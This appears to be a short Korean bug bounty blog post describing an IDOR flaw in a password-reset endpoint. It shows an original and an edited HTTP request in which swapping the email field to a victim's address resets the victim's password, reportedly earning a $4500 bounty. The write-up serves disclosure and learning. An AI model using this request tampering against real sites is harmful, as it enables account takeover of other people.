A Simple IDOR to Account Takeover

Notice

Recent Posts

Tags more

관리 메뉴

Hack The World

BugBounty/Write up

Talkative 2020. 3. 7. 12:47

비밀번호reset 페이지에서 간단한 IDOR 로 $4500 을 받은 리포트

Original Request:-

POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1

Host: subdomain.example.com

Headers: Etc

Cookie: all_required_cookies

{“email”:”attacker_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}

Edited Request:-

POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1

Host: subdomain.example.com

Headers: Etc

Cookie: all_required_cookies

{“email”:”victim_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}

공격자의 패스워드를 변경하는 요청에서 email 을 희생자의 이메일로 변경하고 요청했더니

희생자의 비밀번호가 변경.

내가 하는 사이트에서는 이런 간단한 취약점은 절때 안나오던데...휴...

이 취약점으로 헌터는 $4500 포상금 받은 개꿀 취약점

Host header injection 취약점 $800 (0)	2020.04.08
IDOR + PATCH 메소드 사용 계정우회 (0)	2020.03.10
Hyperlink Injection - Easy Money (sometimes) (0)	2020.02.28
hacked Uber Account (0)	2020.02.14
Host header poisoning 비밀번호 탈취 (0)	2020.02.13

공유하기 링크

'BugBounty/Write up' Related Articles

Comments